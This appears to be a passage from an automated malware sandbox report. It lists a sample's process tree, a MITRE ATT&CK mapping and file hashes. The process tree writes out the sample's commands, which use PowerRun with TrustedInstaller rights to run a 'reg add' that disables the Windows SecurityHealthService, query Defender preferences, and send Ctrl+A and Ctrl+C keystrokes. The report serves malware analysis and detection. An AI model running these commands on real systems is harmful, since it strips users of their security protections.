    - Suspicious behavior: EnumeratesProcesses
    PID:1444
  - - C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\$_32_\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2324
    - - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:2400
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -Command "Get-MpPreference"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2908
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^a')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3012
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^c')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:688

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240712074711.log C:\Windows\Logs\CBS\CbsPersist_20240712074711.cab
1⤵
- Drops file in Windows directory
PID:2360

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1160308711850959773750736562992138111-5490798432027477033-9644771231251609610"
1⤵
PID:564

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-588775620-1653495201-49754669696774828-1572748936-446704041-30618211486834948"
1⤵
PID:2104

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\autA8AE.tmp

Filesize
25KB

MD5
436c1bb98deeccecb73fad945f1dd3dc

SHA1
774313ba911945589971bbc73498d81f060dabe6

SHA256
05eae1691149cc66e458d5e5b4430bd3b938b278b8bdb2c887a13c9871004c51

SHA512
66ea41b9b4a42f7c40d1ce5b6e82a6f03e8489648b912d96a81efa13d340d4d651078df7c1302c595ca83408e7208d1d79f02165dc27383952a9abe7f851c3e2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
15d8ba6d0b6c486889dcd85ad1486ed2

SHA1
912c5ac14f3ba60b8063cda14c3252ca7cb15165

SHA256
949804e3fc00d5e17b2a37bc01621fd07bbfca723dacc665cff1ff2fe915ac84

SHA512
53bc7359603870c5d88b0cd7c2e7bb798df8b59bce55c166454ef166c46f511cf34427477ac89a8a8818d47b5ea54316022afcf2ba028bfe020049d9927bf6d7

Download Submit
C:\Windows\Temp\nntzydh

Filesize
81KB

MD5
940b1915cadee0e2b33d80799816f6c7

SHA1
2c10e4fec3e8c054055d1ed78757117575f273f2

SHA256
81e89e7266cfe5158e44f5578c8be61353e781daebdd47a33597e9ec503d379c

SHA512
cc3c574fd5392c1b54146b591e22b1c01c95e34a602c403ad96c49b7ee6ad31d1478a00cc1334286addc5cb94496372a172745e9ad20554023e1e22c7da1e1c5

Download Submit
memory/2908-319-0x000000001B630000-0x000000001B912000-memory.dmp

Filesize
2.9MB

Download
memory/2908-327-0x00000000022C0000-0x00000000022C8000-memory.dmp

Filesize
32KB

Download
memory/3012-347-0x000000001B770000-0x000000001BA52000-memory.dmp

Filesize
2.9MB

Download
memory/3012-348-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

Filesize
32KB

Download